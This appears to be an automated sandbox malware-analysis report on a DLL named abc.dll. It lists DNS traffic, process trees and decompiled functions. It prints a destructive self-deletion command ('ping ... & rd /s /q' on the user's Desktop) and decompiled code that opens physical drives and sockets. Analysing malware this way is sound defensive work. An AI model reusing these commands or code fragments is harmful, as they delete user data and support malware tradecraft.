Feb 17, 2022 20:25:16.158566952 CET	8.8.8.8	192.168.2.5	0x6e69	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:20.663877010 CET	8.8.8.8	192.168.2.5	0xf332	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:20.663877010 CET	8.8.8.8	192.168.2.5	0xf332	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:24.771568060 CET	8.8.8.8	192.168.2.5	0x3223	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:24.771568060 CET	8.8.8.8	192.168.2.5	0x3223	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:29.013144016 CET	8.8.8.8	192.168.2.5	0xbb4	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:29.013144016 CET	8.8.8.8	192.168.2.5	0xbb4	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:32.890717030 CET	8.8.8.8	192.168.2.5	0x51e7	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:32.890717030 CET	8.8.8.8	192.168.2.5	0x51e7	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:36.917221069 CET	8.8.8.8	192.168.2.5	0x9fea	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:36.917221069 CET	8.8.8.8	192.168.2.5	0x9fea	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:41.252222061 CET	8.8.8.8	192.168.2.5	0xfb3c	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:41.252222061 CET	8.8.8.8	192.168.2.5	0xfb3c	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:45.085952044 CET	8.8.8.8	192.168.2.5	0xed3e	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:45.085952044 CET	8.8.8.8	192.168.2.5	0xed3e	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:49.062124968 CET	8.8.8.8	192.168.2.5	0x7c1	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:49.062124968 CET	8.8.8.8	192.168.2.5	0x7c1	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:53.087526083 CET	8.8.8.8	192.168.2.5	0x172f	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:53.087526083 CET	8.8.8.8	192.168.2.5	0x172f	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:57.372282982 CET	8.8.8.8	192.168.2.5	0x9dd2	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:57.372282982 CET	8.8.8.8	192.168.2.5	0x9dd2	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:01.156995058 CET	8.8.8.8	192.168.2.5	0x1a3a	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:01.156995058 CET	8.8.8.8	192.168.2.5	0x1a3a	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:05.160805941 CET	8.8.8.8	192.168.2.5	0xf763	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:05.160805941 CET	8.8.8.8	192.168.2.5	0xf763	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:09.497654915 CET	8.8.8.8	192.168.2.5	0x4c4e	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:09.497654915 CET	8.8.8.8	192.168.2.5	0x4c4e	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:13.480824947 CET	8.8.8.8	192.168.2.5	0xaf17	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:13.480824947 CET	8.8.8.8	192.168.2.5	0xaf17	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:17.239001036 CET	8.8.8.8	192.168.2.5	0x1529	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:17.239001036 CET	8.8.8.8	192.168.2.5	0x1529	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:21.546710014 CET	8.8.8.8	192.168.2.5	0xb0d7	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:21.546710014 CET	8.8.8.8	192.168.2.5	0xb0d7	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:25.332226038 CET	8.8.8.8	192.168.2.5	0xb869	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:25.332226038 CET	8.8.8.8	192.168.2.5	0xb869	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:29.770348072 CET	8.8.8.8	192.168.2.5	0x89f8	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:26:29.770348072 CET	8.8.8.8	192.168.2.5	0x89f8	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 2436, Parent PID: 6004

General

Target ID:	1
Start time:	20:22:22
Start date:	17/02/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\abc.dll"
Imagebase:	0xb70000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 468, Parent PID: 2436

General

Target ID:	3
Start time:	20:22:23
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5668, Parent PID: 2436

General

Target ID:	4
Start time:	20:22:24
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5656, Parent PID: 468

General

Target ID:	5
Start time:	20:22:24
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5028, Parent PID: 5656

General

Target ID:	6
Start time:	20:22:25
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2224, Parent PID: 5028

General

Target ID:	7
Start time:	20:22:26
Start date:	17/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 160, Parent PID: 5028

General

Target ID:	8
Start time:	20:22:26
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x7ff797770000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4396, Parent PID: 2436

General

Target ID:	10
Start time:	20:22:27
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4620, Parent PID: 2436

General

Target ID:	12
Start time:	20:22:30
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 2616, Parent PID: 4620

General

Target ID:	15
Start time:	20:22:32
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736
Imagebase:	0xa30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3556, Parent PID: 2436

General

Target ID:	16
Start time:	20:22:34
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 984, Parent PID: 2436

General

Target ID:	17
Start time:	20:22:34
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4912, Parent PID: 2436

General

Target ID:	18
Start time:	20:22:35
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3352, Parent PID: 3556

General

Target ID:	19
Start time:	20:22:35
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 3440, Parent PID: 3352

General

Target ID:	21
Start time:	20:22:36
Start date:	17/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 4944, Parent PID: 3352

General

Target ID:	22
Start time:	20:22:37
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x11b0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 1768, Parent PID: 4912

General

Target ID:	23
Start time:	20:22:38
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
Imagebase:	0xa30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 456, Parent PID: 3472

General

Target ID:	32
Start time:	20:22:58
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3696, Parent PID: 456

General

Target ID:	33
Start time:	20:22:59
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 468, Parent PID: 3696

General

Target ID:	34
Start time:	20:23:00
Start date:	17/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 4684, Parent PID: 3696

General

Target ID:	35
Start time:	20:23:01
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x11b0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3352, Parent PID: 3472

General

Target ID:	36
Start time:	20:23:07
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Imagebase:	0x360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 5612, Parent PID: 3352

General

Target ID:	37
Start time:	20:23:08
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 1844, Parent PID: 5612

General

Target ID:	38
Start time:	20:23:09
Start date:	17/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 2604, Parent PID: 5612

General

Target ID:	39
Start time:	20:23:09
Start date:	17/02/2022
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x11b0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 5668, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	11.8%
Signature Coverage:	3.3%
Total number of Nodes:	424
Total number of Limit Nodes:	13

Executed Functions

Function 1000490F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000000,00000202,?), ref: 1000498A
socket.WS2_32(00000002,00000002,00000000), ref: 10004992

Strings

127.0.0.1, xrefs: 100049AB
8.8.8.8, xrefs: 10004949

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: socket
String ID: 127.0.0.1$8.8.8.8
API String ID: 98920635-3846239810
Opcode ID: 484ae023bda2c9abf10d61ce06a99c516603c4f19dc912a80c719e5c4a5fa73c
Instruction ID: 0b70e4a6fd8a10ce365d551e74f64ff4b5dc65bee0e894cf1513fcdb4ad18bea
Opcode Fuzzy Hash: 484ae023bda2c9abf10d61ce06a99c516603c4f19dc912a80c719e5c4a5fa73c
Instruction Fuzzy Hash: 30317A76D0425CAEEB11DBE4CC85ADEBBB8EF85340F1001AAE604AB291DB756B44CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10008B8B Relevance: 5.2, Strings: 4, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E10008B8B(unsigned int* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v8;
				char _v32;
				char _v84;
				char _v120;
				char _v632;
				char _v648;
				char _v1672;
				void* __ebx;
				void* __edi;
				signed int __esi;
				void* __ebp;
				signed char _t33;
				void* _t35;
				signed char _t37;
				unsigned int* _t39;
				void* _t40;
				char _t44;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t51;

				_t39 = __ecx;
				_push(_t48);
				_t33 = E10029F3F( &_v84, __eflags,  &_v84, "\\\\.\\PHYSICALDRIVE%d", _a4, _t46);
				if(__eflags != 0) {
					_t35 = (_t33 | 0x00000091) + 1;
					do {
						 *(_t51 + _t48 - 0x100) =  *_t39 >> 8;
						_t44 =  *_t39;
						_t49 = _t48 + 1;
						_t39 =  &(_t39[1]);
						 *((char*)(_t51 + _t49 - 0x100)) = _t44;
						_t48 = _t49 + 1;
						_t35 = _t35 - 1;
					} while (_t35 != 0);
					 *(_t51 + _t48 - 0x100) =  *(_t51 + _t48 - 0x100) & 0x00000000;
					_t45 = 0;
					_t40 = 0;
					if(_t48 > 0) {
						do {
							_t37 =  *((intOrPtr*)(_t51 + _t40 - 0x100));
							if(_t37 != 0 && _t37 != 0x20) {
								 *(_t45 + 0x10017ba0) = _t37;
								_t45 = _t45 + 1;
							}
							_t40 = _t40 + 1;
						} while (_t40 < _t48);
					}
					 *(_t45 + 0x10017ba0) =  *(_t45 + 0x10017ba0) & 0x00000000;
					return 0x10017ba0;
				} else {
					asm("les ecx, [ebx+esi]");
					asm("fisttp dword [ebp+0x5353b045]");
					_push(3);
					_push(__ebx);
					_push(3);
					_push(0xc0000000);
					_push(__eax);
					__eax = E10021444(__eax, __ebx, __ecx, __edx, __edi, __eflags);
					__eflags =  *(__ebx - 0x377c10) & __cl;
					__eflags = __esi - __eax;
					if(__eflags != 0) {
						__eax =  &_a4;
						__eax =  &_v32;
						__eax = E100273A0(__ebx, __ecx, __edx, __edi, __eflags); // executed
						__eax =  &_v8;
						__eax = E100291CB(__ecx, __edx, __ecx, 0x400,  &_v8);
						0x1003dd50(0x1300, __ebx, __eax, __ebx, __ebx, __esi, __esi, 0x74080, __ebx, __ebx,  &_v32, 0x18,  &_a4, __ebx);
						__cl = __cl +  *((intOrPtr*)(__edx - 0x3cc518bb));
						__eflags = __cl;
						if(__cl > 0) {
							__al = __al & 0x00000010;
							__ecx =  &_a4;
							__al =  ~__al;
							asm("sbb eax, eax");
							__al = __al & 0x000000b5;
							__eax =  &(__eax[0x76]);
							__edx =  &_v120;
							__ax & 0x0000ffff =  &_v648;
							__ecx = __esi;
							__eax = E10008ABE(__esi,  &_v120,  &_v648, __ax & 0x0000ffff, __ebx,  &_a4);
							__eflags = __eax;
							if(__eax != 0) {
								0x1004120f(__esi, __esi);
								__ecx =  &_v1672;
								__eax =  &_v632;
								__edx = 0x100;
								do {
									__esi =  *__eax & 0x0000ffff;
									__eax =  &(__eax[0]);
									 *__ecx = __esi;
									__eax =  &(__eax[0]);
									__ecx = __ecx + 4;
									__edx = __edx - 1;
									__eflags = __edx;
								} while (__eflags != 0);
								_t28 = __edi + 0x44; // 0x44
								__esi = _t28;
								_push(0x40);
								_push(__ebx);
								__eax = E1000CCFC(__ebx, __ecx, _t28, __ebp, __eflags, _t28);
								__ecx =  &_v1672;
								_push(0x13);
								__edx = 0xa;
								_push(E10008B19(__ecx, __edx));
								__eax = E1000CD0E(__ecx, __esi);
								_t30 = __edi + 4; // 0x4
								__esi = _t30;
								_push(0x40);
								_push(__ebx);
								__eax = E1000CCFC(__ebx, __ecx, _t30, __ebp, __eflags, _t30);
								__ecx =  &_v1672;
								_push(0x2e);
								__edx = 0x1b;
								_push(E10008B19(__ecx, __edx));
								__eax = E1000CD0E(__ecx, __esi);
								__eax = 0;
								__eflags = 0;
							} else {
								_push(0xfffffffd);
								goto L14;
							}
						} else {
							_push(0xfffffffe);
							L14:
							_pop(__eax);
						}
					}
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					return __eax;
				}
			}

0x10008b8b
0x10008b95
0x10008ba5
0x10008baa
0x10008b31
0x10008b32
0x10008b37
0x10008b3e
0x10008b40
0x10008b41
0x10008b44
0x10008b4b
0x10008b4c
0x10008b4c
0x10008b4f
0x10008b57
0x10008b59
0x10008b5d
0x10008b5f
0x10008b5f
0x10008b68
0x10008b6e
0x10008b74
0x10008b74
0x10008b75
0x10008b76
0x10008b5f
0x10008b7a
0x10008b88
0x10008bac
0x10008bac
0x10008baf
0x10008bb5
0x10008bb7
0x10008bb8
0x10008bba
0x10008bbf
0x10008bc0
0x10008bc5
0x10008bcb
0x10008bcd
0x10008bd3
0x10008bd8
0x10008be7
0x10008bed
0x10008bf8
0x10008c04
0x10008c09
0x10008c09
0x10008c0f
0x10008c15
0x10008c17
0x10008c1a
0x10008c1c
0x10008c1f
0x10008c22
0x10008c27
0x10008c2e
0x10008c35
0x10008c37
0x10008c3c
0x10008c3e
0x10008c47
0x10008c4c
0x10008c52
0x10008c58
0x10008c5d
0x10008c5d
0x10008c60
0x10008c61
0x10008c63
0x10008c64
0x10008c67
0x10008c67
0x10008c67
0x10008c6a
0x10008c6a
0x10008c6d
0x10008c6f
0x10008c71
0x10008c79
0x10008c7f
0x10008c83
0x10008c89
0x10008c8b
0x10008c90
0x10008c90
0x10008c93
0x10008c95
0x10008c97
0x10008c9f
0x10008ca5
0x10008ca9
0x10008caf
0x10008cb1
0x10008cb7
0x10008cb7
0x10008c40
0x10008c40
0x00000000
0x10008c40
0x10008c11
0x10008c11
0x10008c42
0x10008c42
0x10008c42
0x10008c0f
0x10008cba
0x10008cbb
0x10008cbc
0x10008cbe
0x10008cbe

Strings

\\.\PHYSICALDRIVE%d, xrefs: 10008B9F
C:\Users\user\Desktop, xrefs: 10008B96
12071239, xrefs: 10008B94, 10008BB7, 10008BD6, 10008BDE, 10008BDF, 10008BEC, 10008BF0, 10008BFE, 10008C21, 10008C6F, 10008C95
C:\Users\user\Desktop\abc.dll, xrefs: 10008B8B

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: 12071239$C:\Users\user\Desktop$C:\Users\user\Desktop\abc.dll$\\.\PHYSICALDRIVE%d
API String ID: 0-1891501486
Opcode ID: 72a6a4b8deabb5bb69fdb7b395b36676cf823afa2d40bcd1544f1f2163d78a7d
Instruction ID: b68952829e75ed167b111443bcc5e26f53128a89baf0203bc86807cf9169a0e2
Opcode Fuzzy Hash: 72a6a4b8deabb5bb69fdb7b395b36676cf823afa2d40bcd1544f1f2163d78a7d
Instruction Fuzzy Hash: 874189B65042187AFB21C6609C92FEF376CEB113C4F504165FA85AA0C6EB74AF4683A0

Uniqueness

Uniqueness Score: -1.00%

Function 10007F89 Relevance: 2.6, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E10007F89(char __ebx, void* __edx, intOrPtr* __esi, void* __fp0) {
				intOrPtr _t62;
				int _t63;
				intOrPtr* _t67;
				void* _t72;
				int _t73;
				intOrPtr* _t83;
				intOrPtr _t85;
				int _t93;
				int _t98;
				void* _t101;
				int _t103;
				intOrPtr _t108;
				char _t112;
				signed int _t115;
				void* _t117;
				signed int _t121;
				void* _t128;
				void* _t134;
				void* _t135;
				void* _t138;
				void* _t140;
				void* _t148;
